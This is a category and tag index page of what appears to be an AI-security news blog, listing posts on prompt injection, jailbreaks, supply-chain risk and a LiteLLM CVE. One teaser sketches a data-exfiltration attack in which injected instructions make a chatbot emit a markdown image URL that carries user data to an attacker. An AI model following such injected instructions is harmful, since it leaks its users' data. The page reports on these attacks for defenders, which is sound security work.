Topics
Browse posts by category and tag — every topic we cover, with the latest pieces under each.
Tags
- #llm-security 9
- #prompt-injection 5
- #guardrails 3
- #supply-chain 3
- #agentic-ai 2
- #agents 2
- #data-exfiltration 2
- #owasp-llm 2
- #threat-model 2
- #weekly-digest 2
- #2026 1
- #agent-security 1
- #agentic ai 1
- #ai agents 1
- #ai-attack-examples 1
- #ai-gateway 1
- #ai-risk 1
- #chatbots 1
- #csp 1
- #cve 1
- #jailbreak 1
- #litellm 1
- #llm security 1
- #model-extraction 1
- #offensive-ai 1
- #owasp 1
- #policy 1
- #prompt injection 1
- #rag 1
- #sql-injection 1
- #supply chain security 1
- #threat-intel 1
- #vulnerability-framework 1
Categories
news 7 posts
- AI Sec Weekly: Friday, May 22, 2026This week's digest: SSRF through agent tool-use, the model supply-chain class and why safetensors matters, and model extraction as a business risk.
- AI on the Offense: Google's Zero-Day Warning, Reasoning-Model Jailbreaks, and Government TestingGoogle says it caught an attacker using an LLM to find a zero-day, peer-reviewed research shows reasoning models can autonomously jailbreak other models
- How LLM Chatbots Leak Data Through Their Own Rendered OutputA recurring AI-security finding: an injected instruction makes the model emit a markdown image whose URL carries the user's data to an attacker server.
- AI Sec Weekly: Friday, May 15, 2026This week's digest: indirect injection becomes the agent-era default, the markdown-rendering data-exfiltration class, and why system-prompt secrecy keeps
- The LiteLLM SQL Injection (CVE-2026-42208) and Why AI Gateways Are Crown JewelsA pre-auth SQL injection in the LiteLLM proxy landed in CISA's KEV catalog and was exploited within roughly 36 hours of disclosure.
- Indirect Prompt Injection: The Agent Era's Default VulnerabilityAs LLM agents gained tools and memory, the dangerous injection stopped coming from the user and started coming from the data the agent reads.
LLM Security 2 posts
- OWASP LLM Top 10 2026 Changes: What's New, What's Gone, and What's ComingA practitioner breakdown of the OWASP LLM Top 10 2026 changes — two new threat categories dropped, three proposed additions for 2026, and a companion
- LLM Prompt Injection Attack Examples: Direct, Indirect, and Agentic ExploitsA practitioner-level breakdown of LLM prompt injection attack examples — from basic instruction overrides to CVE-rated zero-click exploits in production